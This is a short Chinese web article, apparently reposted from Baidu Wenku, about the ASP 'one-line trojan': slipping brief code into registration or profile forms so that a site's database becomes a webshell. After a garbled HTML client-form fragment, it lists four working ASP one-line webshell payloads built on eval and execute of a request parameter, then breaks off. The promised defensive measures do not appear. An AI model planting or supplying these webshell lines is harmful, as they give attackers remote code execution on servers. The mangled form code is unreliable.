一句话插入木马

来源:百度文库 编辑:神马文学网 时间:2024/03/28 21:37:20

一句话插入木马

就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。本文就一句话asp木马的工作原理进行了剖析,并在最后列出防范的具体措施。(注:以下代码仅供参考,因为内含木马程序,所以本文已做安全性修改)
一:基础篇


首先我们看一下最常用的一句话木马客户端的代码:


以下是代码片段:


一句话客户端



class="lygf" height="14" cellspacing="0">












size="97" value="http://">
onClick=""

value="Execute("Session("""")=request(""""):
Execute(Session(""""))")">





提供六个服务端:


1. <%eval request("fk")%>


2. <%execute request("fk")%>


3. <%execute(request("fk"))%>


4. <%On Error Resume Next%><%eval request("fk")%>


5.